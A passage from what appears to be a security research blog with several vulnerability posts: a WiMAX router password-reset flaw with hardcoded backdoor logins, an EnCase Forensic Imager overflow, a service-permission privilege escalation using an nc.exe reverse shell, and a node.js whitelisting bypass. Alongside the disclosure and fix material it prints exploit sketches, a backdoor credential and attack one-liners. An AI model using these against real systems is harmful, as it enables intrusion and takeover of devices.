Wednesday, June 7, 2017

Ghosts from the past: Authentication bypass and OEM backdoors in WiMAX routers

Update 2017-06-09: Huawei has released a Security Notice. They recommend "that users replace old Huawei routers with those of later products".

SEC Consult has found a vulnerability in several WiMAX routers that WiMAX ISPs distribute to subscribers. The vulnerability allows an attacker to change the password of the admin user. An attacker can gain access to the device, access the network behind it, launch further attacks, enlist devices in a Mirai-like botnet or simply spy on users. This vulnerability affects devices from GreenPacket, Huawei, MADA, ZTE, ZyXEL and others. Some of the devices are accessible from the web (estimates range from 50,000 to 100,000). Affected vendors were informed by CERT/CC, who released a vulnerability note (VU#350135, CVE-2017-3216).

Further information about the disclosure timeline and affected devices can be found in our advisory. This blog post has some highlights from the vulnerability analysis.

While doing research on HTTPS certificate and SSH key reuse we stumbled upon a group of 80,000 devices that use a certificate issued to "MatrixSSL Sample Server Cert" for the HTTPS web interface. The devices in question are WiMAX gateways likely developed by ZyXEL or its sister company MitraStar. We managed to get our hands on one device and did a bit of analysis.

WiMAX is a wireless broadband technology similar to LTE. Although LTE is more popular nowadays, many WiMAX networks still exist all over the world.

Based on the information we got from internet-wide scan data, we know that a lot of devices expose a web server on the WAN interface. This is caused by a misconfiguration, or more likely carelessness by the ISPs that provide WiMAX gateways to customers. Web interfaces are usually a good place to hunt for vulnerabilities.

Like in all IoT pentests we grabbed a copy of the firmware (luckily available on ZyXEL's website, no hardware hacking via UART, JTAG and desoldering this time!) and uploaded it into our cloud based firmware analysis system IoT Inspector. After a few minutes the analysis results were available.

We start by looking at the file system structure. There are a bunch of HTML files in the /var/www/ directory, but usually these files are just HTML templates and do not contain any further logic.

excerpt from IoT Inspector file system browser

There are no traditional CGI binaries either, so the web interface logic is likely embedded in the web server itself. The web server is implemented in /bin/mini_httpd.elf. The name mini_httpd would indicate that it is somehow related to the mini_httpd open source project, but we are either dealing with something completely different or a heavily modified version of the open source project. At first sight the web server does not contain the web interface logic either, but there is a function that loads libraries located in the /lib/web_plugin/ directory using dlopen() and resolves several symbols.

Looking at /lib/web_plugin/, there is only one library there. At the location of the symbol mime_handlers there is an array of structures that describe how different URI patterns are handled. This library also contains the implementation of the request handlers.

For each incoming request the web server tries to find a matching pattern in the mime handlers array; if a matching pattern is found, the function pointer to the function that handles the request is called. Because we are in a good mood, we tell IDA Pro what we think such a structure looks like and convert the entries in the mime_handlers list.

We now have a pretty good understanding of which URIs exist and how they are processed. The structure even contains an enum that specifies whether the user has to be authenticated (we called its values AUTH_REQUIRED/UNAUTHENTICATED). There are lots of URIs that do not require any authentication and are worth a closer look, but we will focus on commit2.cgi.
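Conceptually, the dispatch loop described above boils down to the following (a Python stand-in for the actual C code: only commit2.cgi and the AUTH_REQUIRED/UNAUTHENTICATED enum come from the binary; the second table entry and the handler bodies are invented for illustration):

```python
from fnmatch import fnmatch

AUTH_REQUIRED, UNAUTHENTICATED = 1, 0  # names we assigned to the enum in IDA

def handle_commit2(request):
    return "stored"  # the real handler writes the POST args to the key-value store

# Analogue of the mime_handlers array: (URI pattern, auth flag, handler pointer).
MIME_HANDLERS = [
    ("commit2.cgi", UNAUTHENTICATED, handle_commit2),
    ("admin.html", AUTH_REQUIRED, lambda request: "admin page"),  # invented entry
    # ... many more entries in the real plugin library ...
]

def dispatch(uri, request, authenticated=False):
    """Walk the handler table; call the first handler whose pattern matches."""
    for pattern, auth, handler in MIME_HANDLERS:
        if fnmatch(uri, pattern):
            if auth == AUTH_REQUIRED and not authenticated:
                return "401"
            return handler(request)
    return "404"

print(dispatch("commit2.cgi", {}))  # reachable without any session
```

The security-relevant detail is that the auth check is a per-entry flag, so a single mis-flagged entry like commit2.cgi exposes its handler to everyone.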

The handler for this URI simply stores the arguments and values of a URL-encoded HTTP POST request in the internal database (a key-value store, probably persisted in NVRAM). The simplest exploit for this vulnerability is to change the administrator password (argument ADMIN_PASSWD). Afterwards one can log in via the web interface and do some post-exploitation.
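As a minimal exploit sketch: the commit2.cgi endpoint and the ADMIN_PASSWD argument come from the analysis above, while the target address (an RFC 5737 example address) and everything else about the request are assumptions:

```python
import ssl
from urllib.parse import urlencode
from urllib.request import Request, urlopen

def build_request(target: str, new_password: str) -> Request:
    """Build the unauthenticated URL-encoded POST that overwrites ADMIN_PASSWD."""
    body = urlencode({"ADMIN_PASSWD": new_password}).encode()
    return Request(f"https://{target}/commit2.cgi", data=body,
                   headers={"Content-Type": "application/x-www-form-urlencoded"})

req = build_request("192.0.2.1", "new-secret")

# The devices serve the "MatrixSSL Sample Server Cert", so certificate
# verification has to be disabled. Only send this to devices you are
# authorized to test:
ctx = ssl.create_default_context()
ctx.check_hostname, ctx.verify_mode = False, ssl.CERT_NONE
# urlopen(req, timeout=10, context=ctx)

print(req.full_url)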

So what can we do from here on? That depends on the goal of the attacker. The web interface has a ton of functionality that could be of interest: changing the DNS servers (banking fraud, ad fraud), or uploading malicious firmware that, for example, contains a botnet client or monitors the WiMAX customer's internet activity. The SSH/Telnet daemon is quite interesting too...

OEM Backdoors in practice

The SSH/Telnet daemon can be enabled via the web interface. One can log in using the same credentials as for the web interface and get a simple Cisco-style CLI. There are various commands that likely allow an attacker to escape it and get a regular Linux shell. But there is more:

While we focused on manual analysis of the web server for now, the results from IoT Inspector's automated analysis are quite interesting as well. One of the IoT Inspector plugins collects hardcoded Unix-style password hashes and submits them to our GPU-Server for cracking.

excerpt from IoT Inspector results

Some of the password hashes seem to be default passwords or placeholders. The hashes in the file minihttpd.trans are quite interesting.

Despite its name, minihttpd.trans sets up the Linux /etc/passwd and /etc/shadow files at system boot. Below is an excerpt from the script.

This part of the script adds two backdoor users to the /etc/passwd and /etc/shadow files. The user mfgroot always has the same password hash $1$.3r0/KnH$eR.mFSJKIiY.y2QsJVsYK. (%TGBnhy6m), while the password of the user root depends on the system variable ZY_CUSTOMER. The list contains the hashes we found in various firmware files.






Cracking the password hashes in the list is an exercise left to the reader. Regardless of which OEM customer credentials are set, one can log in using the credentials mfgroot:%TGBnhy6m and get a root shell.
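A trivial check for the backdoor account in an extracted firmware filesystem might look like this (the hash is the mfgroot hash quoted above; the sample shadow content is invented for illustration):

```python
# The hardcoded MD5-crypt hash of the mfgroot backdoor account.
MFGROOT_HASH = "$1$.3r0/KnH$eR.mFSJKIiY.y2QsJVsYK."

def find_backdoor(shadow_text: str):
    """Return the names of accounts in a shadow file using the known hash."""
    hits = []
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) > 1 and fields[1] == MFGROOT_HASH:
            hits.append(fields[0])
    return hits

# Invented sample content of an extracted /etc/shadow:
sample = ("root:$1$abcdefgh$xxxxxxxxxxxxxxxxxxxxxx:0:0:::\n"
          "mfgroot:$1$.3r0/KnH$eR.mFSJKIiY.y2QsJVsYK.:0:0:::")
print(find_backdoor(sample))
```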

Down the IoT supply chain...

The supply chain for IoT devices is often complex. The fact that the "commit2.cgi vulnerability" is located in libMTK hints that this library is part of MediaTek software, possibly an SDK that MediaTek provides for customers who build their products on MediaTek SoCs. This makes sense because the affected devices are all based on MediaTek hardware. These SDKs often come with everything that is required to use the hardware and even contain a working web interface. Vendors can choose to use the whole SDK to build their product or just use some drivers/middleware and build the rest themselves.

CERT/CC contacted MediaTek regarding the vulnerability. They responded that their SDK code is not vulnerable and that they suspect ZyXEL added the vulnerable code. Based on this information we suspect it went down like this:
  1. MediaTek manufactures a SoC for WiMAX products, provides SDK with sample web interface code to vendors.
  2. ZyXEL and their sister company MitraStar develop firmware based on the MediaTek SDK, introducing the "commit2.cgi vulnerability" and the "OEM backdoors".
  3. ZyXEL sells the products to ISPs.
  4. MitraStar works as an OEM for GreenPacket, Huawei, ZTE... who also sell the products to ISPs.
  5. ISPs sell/lease the devices to their subscribers as customer premises equipment (CPE).

Usually OEM customers will not even admit that there is an OEM. We specifically asked Huawei and got this response:

Long supply chains and OEMs make it hard to determine which products are affected by a vulnerability. This is one of the reasons why we developed IoT Inspector. One of the use cases is to see if a specific vulnerability exists in firmware loaded into IoT Inspector. We have used this approach successfully in the past, e.g. for the KCodes NetUSB and the AMX vulnerabilities.

excerpt from IoT Inspector results 

So we created a simple IoT Inspector plugin that detects the "commit2.cgi vulnerability" and used it on a firmware data set that contains the firmware of a few thousand products including all WiMAX CPE firmware we could find on the web. Using this approach we could determine which products from GreenPacket, Huawei, MADA, ZyXEL and ZTE are affected. For a list of affected devices see our advisory.
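The internals of the real plugin are not public, but conceptually such a check can be as simple as looking for the telltale strings in every file of an unpacked firmware image (the marker strings are taken from the analysis above; everything else is an illustrative sketch):

```python
import os

# Strings that together indicate the vulnerable plugin library is present.
MARKERS = (b"commit2.cgi", b"mime_handlers")

def scan_firmware(root: str):
    """Walk an unpacked firmware tree and flag files containing all markers."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as f:
                    blob = f.read()
            except OSError:
                continue  # device nodes, unreadable files, etc.
            if all(m in blob for m in MARKERS):
                hits.append(path)
    return hits
```

A real plugin would of course inspect the handler table itself rather than rely on strings, but even this crude approach narrows thousands of firmware images down to a handful of candidates.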

IoT device life cycle

The affected products are quite old, likely manufactured in the early 2010s. According to Huawei, all of their affected products have been end-of-service since 2014 and will not receive any updates. Researcher Pierre Kim found vulnerabilities in another set of Huawei WiMAX CPEs back in 2015 that suffer the same fate. We reported this vulnerability to CERT/CC, who coordinated the disclosure and released a vulnerability note (VU#350135), thanks! They unfortunately did not get a response from ZyXEL.
It is unlikely that any of the affected devices will receive updates, so the only solution is to replace them.

ISPs should limit the attack surface on CPEs as much as possible. This is not just limited to the web interface and SSH/Telnet but also to the TR-069 Connection Request Server.

For further information regarding affected devices see our advisory. IoT Inspector now comes with a plugin that detects this vulnerability.


This research was done by Stefan Viehböck (@sviehb) on behalf of SEC Consult Vulnerability Lab. SEC Consult is always searching for talented security professionals to work in our team. More information can be found at:


Wednesday, May 17, 2017

Tracking the culprit: SEC Technologies and Fraunhofer IPK develop technology to identify criminal activities in enterprise networks

Violence, extremism and child abuse: a lot of criminal activity is captured in images and distributed via the internet and social media. But how can companies protect their networks from being abused for such purposes? If operators do not want to be unwilling accomplices, they must take the necessary measures to prevent these crimes. SEC Technologies, SEC Consult's subsidiary for technical innovation and development, and Fraunhofer IPK have set a technical milestone in identifying criminal images: Traffiic (Traffic analysis for incriminating image content) is able to recognize acts of abuse by combining text and image analysis with machine learning, which makes it possible to evaluate image content and raise an alarm if necessary.

The aim of the jointly developed technology was software that can discover such content and helps counter the misuse of infrastructure. The result is a modular system that can be integrated into the enterprise network as a passive component. Minimal delay in network traffic and minimal hardware requirements make it easy to run this technology in the background. At the heart of the system is its data extraction capability: in case of findings, the network operator is informed immediately and can take countermeasures.

High quality technology against violent crime

Fraunhofer IPK developed a new system which detects acts of abuse by combining text and image analysis with machine learning. To achieve a high detection rate with a low error rate, several different, specialized and intelligent "classifiers" are used. For example, the first classifier recognizes erotic imagery. Such a "positive" finding activates another classifier, which was trained to recognize child abuse. Apart from the image content itself, the filename and EXIF information, which reveals facts about the camera used, are also analyzed.
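Stripped of the actual models, the cascade described above boils down to lazy evaluation of increasingly specialized classifiers; the stand-in stage functions and thresholds below are purely illustrative, not the Fraunhofer IPK models:

```python
def cascade(image, stages):
    """Run classifiers in order; bail out at the first negative stage."""
    for stage in stages:
        if not stage(image):
            return False  # cheap early exit keeps the expensive stages idle
    return True  # every stage fired -> raise an alarm

# Invented stand-in classifiers operating on invented feature dicts:
stage1 = lambda img: img.get("skin_ratio", 0.0) > 0.3   # coarse pre-filter
stage2 = lambda img: img.get("abuse_score", 0.0) > 0.9  # specialized model

print(cascade({"skin_ratio": 0.5, "abuse_score": 0.95}, [stage1, stage2]))
print(cascade({"skin_ratio": 0.1}, [stage1, stage2]))  # stage 2 never runs
```

The cascade structure is what keeps the error rate low: the specialized (and expensive) second stage only ever sees traffic that the first stage already flagged.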

Markus Robin, General Manager SEC Consult: “Apprehending criminals and safeguarding victims was our guiding idea during the development of this technology. Studies show that in hidden services, 80 % of site visits were related to child abuse content. As cybersecurity experts it is also our responsibility to enable a safe world. More and more frequently, companies register a misuse of their network and infrastructure. That’s why we developed Traffiic – to support companies in their network protection, spare them from unwittingly becoming accomplices and set measures against the horrible sharing of violent crimes.”

In the course of this project SEC Technologies developed solutions for detecting and analyzing critical content in networks. The module implemented for data extraction makes it possible to identify images and videos in the network's data streams and to extract and store them for analysis. In addition to extracting the files, evaluating the source of an image is of central importance. Based on earlier data analyses, another module for the evaluation of network sources investigates the reputation of the system in question by linking and examining different data sources such as whois databases and IP reputation services. As a result, the system's reputation can be included in the evaluation of an image, which significantly enhances the accuracy of the whole evaluation. Dr. Franz Fotr, court-certified IT security expert, said at the workshop in Berlin: “I am delighted that the cooperation between SEC Technologies and the Fraunhofer IPK (Institute for Production Systems and Design Technology) bears fruit. The developments of the project Traffiic empower companies of all sizes to monitor their infrastructure and to protect it from attacks. That makes it significantly more difficult for criminals to misuse infrastructures and contributes to stopping the spread of child pornography.”


Thursday, May 11, 2017

Chainsaw of Custody: Manipulating forensic evidence the easy way

When it comes to computer forensics, or for that matter forensics in general, one of the main challenges is to ensure that evidence that is collected is not tampered with. To achieve this, computer forensic experts adhere to a strict protocol and use many specialized hardware and software tools.

As we have shown time and time again, specialized security software is not immune to security vulnerabilities. Knowing this, we sometimes audit software products used for our core processes to achieve the best level of security for our customer's data. One of these software products is EnCase Forensic Imager.

EnCase Forensic Imager is a free tool that allows a forensic investigator to gather evidence from storage media. This evidence can then later be analyzed using the commercial EnCase Forensic suite. To efficiently gather evidence, EnCase Forensic Imager is able to process many different formats commonly used on storage media. However, parsing untrusted data from a suspect's storage device can be dangerous. There's always the risk that a suspect has manipulated his storage device so that forensic software fails to read any data, ignores incriminating data, or even takes over the investigator's machine. The latter is exactly what SEC Consult demonstrated to be possible with EnCase Forensic Imager in the latest advisory.

EnCase Forensic Imager crash - code execution (example: calc.exe)

The attack

By writing a manipulated LVM2 partition (a hard disk format commonly used for Linux servers) on a storage device, an attacker could - if the device were ever to be analysed using EnCase Forensic Imager - take over an investigator's machine. When the investigator tries to read the device, EnCase Forensic Imager crashes - unbeknownst to the investigator, however, a lot more is happening. Through a buffer overflow security flaw, EnCase Forensic Imager can be tricked into executing data read from the storage device. Afterwards the code provided by the attacker has full control of the investigator's machine and can be used by the suspect to manipulate evidence.
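For illustration, this is roughly what planting an LVM2 label on a device image looks like. The "LABELONE" magic and "LVM2 001" type at sector 1 are the standard LVM2 on-disk format; which field EnCase Forensic Imager actually mishandles is described in the advisory, so the oversized value below is merely a stand-in for "malformed metadata":

```python
import struct

def forge_label(sector=1):
    """Build one 512-byte sector carrying a deliberately malformed LVM2 label."""
    hdr = struct.pack("<8sQLL8s",
                      b"LABELONE",      # label magic
                      sector,           # sector number holding this label
                      0,                # CRC (left invalid on purpose)
                      0xFFFFFFFF,       # offset to content: absurdly large
                      b"LVM2 001")      # label type
    return hdr.ljust(512, b"\x00")      # pad to one sector

# LVM2 places the label in one of the first four sectors, typically sector 1:
image = b"\x00" * 512 + forge_label()
print(len(image), image[512:520])
```

A forensic tool that trusts the offset and size fields of such a label without bounds-checking them is exactly the kind of parser this attack targets.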

The video below demonstrates a scenario where someone prepared a malicious USB storage medium in case it would ever be analyzed by, e.g., the authorities. When the investigator analyzes it using EnCase Forensic Imager, their machine connects, without their knowledge, to a remote server controlled by the suspect (arbitrary malicious code can be executed). The server can then access the investigator's machine to manipulate or delete evidence.

For technical details please refer to the advisory.

Who's affected?

We found that this issue does not affect the version of the full EnCase Forensic suite we had available for testing. We did not verify whether this issue exists in other versions of EnCase Forensic (apparently EnCase Forensic and EnCase Forensic Imager share the same code base).

According to Guidance Software their products are used by many law enforcement and government agencies such as
  • the FBI
  • the CIA
  • the US Department of Justice
  • the US Department of Homeland Security
  • the London Metropolitan Police Service

as well as several major companies such as
  • Microsoft
  • Facebook
  • Oracle.

It is unclear whether these organisations use the EnCase Forensic Imager tool.

How to avoid attacks?

Some organisations use special machines without network or internet access to handle evidence data. While this is a very good security measure, it does not protect against this attack. Since this vulnerability allows a suspect to execute arbitrary code on these machines, the attacker could create malware that manipulates or deletes evidence based on predefined rules (e.g. delete all Excel files with a specific name pattern).

We provided details for this vulnerability to the vendor back in March 2017. Unfortunately, Guidance Software neither provided a fixed version nor communicated a schedule for fixing this vulnerability within 50 days. As per our responsible disclosure policy we therefore publicly released the advisory. The vendor does currently not provide a version of EnCase Forensic Imager without known vulnerabilities.

This is already the second security vulnerability in EnCase Forensic Imager that the SEC Consult Vulnerability Lab has communicated to Guidance Software in the past few months. Back then, the vendor did not fix the security flaws either (and they have not been resolved yet). This raises the question of whether Guidance Software should rethink their security approach, given the number of trivial vulnerabilities, their high-profile customer base and their displayed handling of vulnerability reports.

We received the following statement on 11th May from Guidance Software which we will leave uncommented as we are still bewildered about it:

"We are aware and appreciate the issues raised by SEC Consult. The exploit SEC Consult claims to have found is an extreme edge case, much like the theoretical alerts they tried to promote in November. As always, we continue to examine alerts when they are submitted and apply changes to our systems as necessary.

Our products give investigators access to raw data on a disk so they can have complete access to all the information.  Dealing with raw data means there are times when malformed code can cause a crash or other issue on an investigator’s machine. We train users for the possibility of potential events like this and always recommend that they isolate their examination computers. After almost 20 years building forensic investigation software that is field-tested and court-proven, we find that the benefits of complete, bit-level visibility far outweigh the inconvenience of a very limited number of scenarios like this. If an issue does arise, it is something we work directly with the customer to resolve.

The nature of our business is dealing with raw data, and that has risk. We will continue to modify our software as necessary to deal with the continually changing environment. If necessary, we will take action and inform our customers. We do not consider this claim to be serious and it will not impact the performance of our products."


This research was done by Wolfgang Ettlinger (@ettisan) on behalf of SEC Consult Vulnerability Lab. SEC Consult is always searching for talented security professionals to work in our team. More information can be found at:


Tuesday, April 25, 2017

What unites HP, Philips and Fujitsu? One service and millions of vulnerable devices.

Yet another windows service privilege escalation?

During Windows client audits it is quite common to try to find a way to escalate privileges in the first place, to widen the attack surface and prepare for more sophisticated attacks (lateral movement, privilege escalation, rinse and repeat). Besides known exploits in various kinds of software, it is always interesting to check for the low-hanging fruits on the privilege escalation tree. Those sweet fruits include weak file and folder permissions, unquoted service paths, or, as described in this blog post, weak service permissions, all of which can lead to privilege escalation on Windows machines.

Those low hanging fruits appear on a regular basis in the life of a penetration tester and they are normally not that sophisticated from a technical perspective.

The identified vulnerable Windows service is pre-installed on millions of laptops, disguised as branded bloatware*. This changes a lot! The privilege escalation is no longer limited to a single misconfigured device in a random company environment.

* The [...] term bloatware is also commonly used to refer to preinstalled software on a device, usually included by the hardware manufacturer, that is mostly unwanted by the purchaser.

Bloatware, a common Cinderella Subject

Bloatware is the software that comes pre-installed on your devices and that nobody really uses. Depending on the hardware vendor, some ship with a lot of bloatware and some try to keep their devices clean. But most of this pre-installed software has one thing in common: it is not developed by the hardware vendor itself but acquired from third parties. As everybody should know, it is very important to test externally developed programs just as thoroughly as self-developed ones before going live. It is also very important that the security requirements are bindingly declared to the contractor as soon as the application is commissioned. Before going live, the contractor has to be obligated to supply a test installation of the system, which can undergo a security-related approval test conducted by security experts.

The past has already shown us that such third-party bloatware acquired by OEMs is treated like an orphaned child: at best it is reviewed and tested by security experts only fragmentarily, and in the worst case the software is rolled out without a proper security review at all. [1] [2] [3]

A virtual on screen display, that can't be dangerous, right... RIGHT?

The vulnerability described in this blog post was found in a core module of a so-called virtual on-screen display (vOSD). The purpose of a virtual on-screen display is to replace the hardware adjustment buttons on screens, notebooks, smartphones and other kinds of displays. It allows a user to quickly manage certain screen parameters (e.g. rotation, alignment, color values, gamma values, color temperature, color saturation, brightness) with a simple piece of software instead of struggling with the hardware buttons on the display.

Portrait Displays Inc., the company responsible for developing the vulnerable software, describes their product as follows:

To get the most out of your display, it is important to set it up properly for your particular room lighting, display placement, and vision. Using the buttons on the edge of the display can be confusing, if not difficult.
Display Tune's OSD Enhancement takes all of the display's button functions and transfers them to the screen, where simple buttons and sliders make screen adjustments a breeze.

That doesn't sound too dangerous, right? Changing the colors of a display is nothing an attacker can use to attack a single PC or a whole company environment. That's probably exactly what some big OEMs thought as well while acquiring the vulnerable software. May he be shamed who thinks badly of it.


The exploitation itself is not too special, so nothing new to see here. For the sake of completeness, the way how the vulnerability was discovered and exploited is described below.

To identify the vulnerable Portrait Displays SDK service, which Portrait Displays Inc. packages for various OEMs as a core component of virtual on-screen displays, the permissions of the service were retrieved with the built-in Windows command "sc". The output of the command for the vulnerable service can be seen below:






By "converting" [4] [5] the Security Descriptor Definition Language into human-readable words, it is possible to identify the following permissions for the PdiService:

RW NT AUTHORITY\Authenticated Users
RW BUILTIN\Administrators
Because every authenticated user has write access to the service, an attacker is able to execute arbitrary code by changing the service's binary path. Moreover, the PdiService is executed with SYSTEM permissions, resulting in privilege escalation.
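For readers who want to repeat the "conversion", the SDDL ACE format is mechanical enough to parse with a few lines of code. The descriptor string below is a hypothetical example in the spirit of the vulnerable service, not the verbatim PdiService descriptor:

```python
import re

# Two-letter SDDL SID abbreviations (subset).
SIDS = {"AU": "NT AUTHORITY\\Authenticated Users",
        "BA": "BUILTIN\\Administrators",
        "SY": "NT AUTHORITY\\SYSTEM"}

# Service access rights that let a caller reconfigure or take over a service.
DANGEROUS = {"DC": "SERVICE_CHANGE_CONFIG",  # enough to change binPath=
             "WD": "WRITE_DAC",
             "WO": "WRITE_OWNER"}

def audit_service_sddl(sddl: str):
    """Return (account, [dangerous rights]) for each access-allowed ACE."""
    findings = []
    for ace in re.findall(r"\(([^)]+)\)", sddl):
        ace_type, _flags, rights, _og, _iog, sid = ace.split(";")
        if ace_type != "A":  # only access-allowed ACEs
            continue
        pairs = [rights[i:i + 2] for i in range(0, len(rights), 2)]
        findings.append((SIDS.get(sid, sid),
                         [DANGEROUS[p] for p in pairs if p in DANGEROUS]))
    return findings

# Hypothetical descriptor as `sc sdshow <service>` might print it:
example = "D:(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
for account, bad in audit_service_sddl(example):
    print(account, "->", bad)
```

Any non-admin principal holding SERVICE_CHANGE_CONFIG (the DC right) is the red flag here: it is exactly what makes the binpath hijack below possible.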

The workflow to execute arbitrary code with elevated SYSTEM privileges is as follows:

1) Stop Service

sc stop pdiservice

2) Alter service binary path

sc config pdiservice binpath= "C:\nc.exe -nv $IP $PORT -e C:\WINDOWS\System32\cmd.exe"

3) Start Service

sc start pdiservice

4) Profit

The possibilities are endless, other useful payloads are the creation of new users, adding users to groups, changing privileges etc. All of the commands are executed with SYSTEM privileges.

The above commands were executed by the "sectester" user who doesn't have administrative privileges (it's a low privileged standard user). As the last figure shows, the user successfully escalated his privileges to SYSTEM.

One service to rule them all

One interesting fact is that this is not the first time pre-shipped bloatware has contained built-in vulnerabilities or "undocumented features" [1] [2] [3].
It is quite telling that companies selling millions of notebooks, PCs and convertibles simply do not care (enough) about security. The affected companies have a net worth of multiple billions, but apparently not a few thousand euros/dollars/yen to conduct a proper security review of the software and services they acquire from third parties. This vulnerability would have been identified immediately in a thorough security review of the application/service, had an audit been conducted by security experts before shipping devices with this software. Even automated vulnerability scans would detect such weak service permissions [6] [7].

But it seems the problem is not limited to the service described in this blog post. A lot of other services from big players are affected as well; the problem is that those vulnerabilities are most of the time downplayed or even ignored (e.g. Dell's DellRctlService [8] or the Lansweeper Service [9] are/were affected by the exact same vulnerability, but no one really noticed and the problem itself was downplayed).


There are two ways to get rid of the vulnerability.

Vendor Patch

The vendor provided a patch for the vulnerable software on their website:


Workaround

To quickly get rid of the vulnerability, the permissions of the service can be altered with the built-in Windows command "sc".
To completely remove the permissions of the "Authenticated Users" group, an sc sdset command with a descriptor that omits the Authenticated Users ACEs can be used:
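The advisory's exact command is not reproduced here. As an illustrative sketch (the service name pdiservice comes from the text; the "current" descriptor below is hypothetical), the tightened security descriptor can be derived by dropping every ACE granted to AU (Authenticated Users) from the output of `sc sdshow pdiservice` and feeding the result back via `sc sdset`:

```python
import re

def drop_au_aces(sddl: str) -> str:
    """Remove every ACE whose trustee is AU (Authenticated Users)."""
    return re.sub(r"\([^)]*;AU\)", "", sddl)

# Hypothetical current descriptor as `sc sdshow pdiservice` might print it:
current = "D:(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
fixed = drop_au_aces(current)
print(f'sc sdset pdiservice "{fixed}"')
```

Always derive the new descriptor from the descriptor actually present on the machine rather than copying one from elsewhere, so that SYSTEM and other required ACEs are preserved.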

This results in the following set of permissions:

RW BUILTIN\Administrators

Affected Vendors/Software

The vendor confirmed that at least the following binaries are vulnerable:

Fujitsu DisplayView Click Versions 6.0 and 6.01

build id: dtune-fts-R2014-04-22-1630-07
build id: dtune-fts-R2014-05-13-1436-35
The issue was fixed in Version 6.3, build id: dtune-fts-R2016-03-07-1133-51

Fujitsu DisplayView Click Suite Version 5

build id: dtune-fus-R2012-09-26-1056-32
The issue is addressed by patch in Version 5.9 build id: dtune-fus-R2017-04-01-1212-32

HP Display Assistant Version 2.1

build id: dtune-hwp-R2012-10-31-1329-38
The issue was fixed in Version 2.11 build id: dtune-hwp-R2013-10-11-1504-22 and above

HP My Display Version 2.01

build id: dtune-hpc-R2013-01-10-1507-17
The issue was fixed in Version 2.1 build id: dtune-hpc-R2014-06-27-1655-15 and above

Philips Smart Control Premium Versions 2.23 and 2.25

build id: dtune-plp-R2013-08-12-1215-13
build id: dtune-plp-R2014-08-29-1016-05
The issue was fixed in Version 2.26, build id: dtune-plp-R2014-11-14-1813-07

The following pieces of software use the Portrait Displays SDK service; SEC Consult did not evaluate whether those packages are vulnerable as well:

-) Fujitsu DisplayView Click v5
-) Fujitsu DisplayView Click v6

Final Words

In the end, we want to thank Portrait Displays Inc. for resolving the issue in a professional way, responding regularly and providing continuous updates about the state of the patch, as well as for recognizing that this vulnerability is critical instead of playing it down like other vendors have done in the past [8] [9]. This is crucial for a well-working responsible disclosure process. Please review the vendor communication timeline for more details [10].

We would also like to thank CERT/CC for setting up the encrypted communication channel with Portrait Displays Inc., as well as for providing a CVE (CVE-2017-3210) and a CERT VU (

This research was done by Werner Schober on behalf of SEC Consult Vulnerability Lab. SEC Consult is always searching for talented security professionals to work in our team. More information can be found at:











Thursday, April 20, 2017

Abusing NVIDIA's node.js to bypass application whitelisting

Application Whitelisting


Update 2017-04-27: NVIDIA has resolved the issue very promptly and published a corresponding security bulletin here.

Application whitelisting is an important security concept which can be found in many environments during penetration tests. The basic idea is to create a whitelist of allowed applications and then only allow the execution of applications on that whitelist. This prevents the execution of dropped malware and therefore increases the overall security of the system and network.

A very commonly used solution for application whitelisting is Microsoft AppLocker. Another concept is to enforce code and script integrity via signatures. This can be achieved on Microsoft Windows 10 or Server 2016 with Microsoft Device Guard.

The SEC Consult Vulnerability Lab has been doing research in this area for several years; bypass techniques were already presented in 2015 and 2016 at conferences such as CanSecWest, DeepSec, Hacktivity, BSides Vienna and IT-SeCX, see [1].

Knowing these bypass techniques is really important for administrators who maintain such protected environments because special rules must be applied to prevent these attacks.

Other good and recommended sources of known bypass techniques and hardening guides are blog posts from Casey Smith (subtee) [2], Matt Nelson (enigma0x3) [3] and Matt Graeber (mattifestation) [4].

NVIDIA's node.js

During a quick research in a different area, I came across a system which had NVIDIA drivers installed. The following executable gets installed by NVIDIA:

%ProgramFiles(x86)%\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
This is a renamed version of node.js (but signed by NVIDIA Corporation), which can be verified via the file's metadata:

That means we can find node.js on systems with NVIDIA drivers installed. Since this file is already on the system and it has a valid signature, it will be whitelisted by the application whitelisting solution.

Nowadays, the most common technique to bypass application whitelisting is to start PowerShell: the target code can be passed inside arguments, it has full access to the Windows API, it is a signed binary from Microsoft and it can be found on all newer systems. However, it is also the first binary which gets removed from the whitelist by administrators; PowerShell v5 provides very good logging (attack detection and forensics), Device Guard UMCI (user mode code integrity) places PowerShell in Constrained Language mode, and antivirus solutions monitor malicious invocations of PowerShell.

Nearly the same advantages can be achieved by abusing NVIDIA's node.js if the target system has these drivers installed. It can be started in interactive mode, which means scripts can be passed via a pipe (payloads are not written to disk). For example, the following command starts the calculator via node.js:

echo require('child_process').exec("calc.exe") | "%ProgramFiles(x86)%\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe" -i 

From an attacker's perspective, this opens two possibilities: either use node.js to directly interact with the Windows API (e.g. to disable application whitelisting, or to reflectively load an executable into the node.js process to run a malicious binary on behalf of the signed process), or write the complete malware in node.js. Both options have the advantage that the running process is signed and therefore bypasses antivirus systems (reputation-based algorithms) by default.

Writing malware completely in node.js has the great side effect that NVIDIA already installs addons with useful functions such as:
  • WebcamEnable (NvSpCapsAPINode.node) 
  • ManualRecordEnable (NvSpCapsAPINode.node) 
  • GetDesktopCaptureSupport (NvSpCapsAPINode.node) 
  • SetMicSettings (NvSpCapsAPINode.node) 
  • RecordingPaths (NvSpCapsAPINode.node) 
  • CaptureScreenshot (NvCameraAPINode.node) 
However, to get the full power of the Windows API, we can write addons in C/C++ for node.js:

Node.js Addons are dynamically-linked shared objects, written in C or C++, that can be loaded into Node.js using the require() function, and used just as if they were an ordinary Node.js module. They are used primarily to provide an interface between JavaScript running in Node.js and C/C++ libraries. [5]

That means node.js has full access to the Microsoft Windows API and reflective DLL injection is possible.

To load such an addon, the path to the .node file must be passed to the require() function. Node files are normal PE files with some special exported functions, but it's also possible to load any .dll file with one of the code lines below (an error will be thrown, but DllMain gets executed):
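To make this concrete, here is a minimal sketch of the behavior described above (the paths are illustrative assumptions; the exact lines from the original screenshot are not reproduced here):

```javascript
// Sketch: loading native code via require(). A .node file is loaded
// like any module; requiring an arbitrary .dll throws, because the
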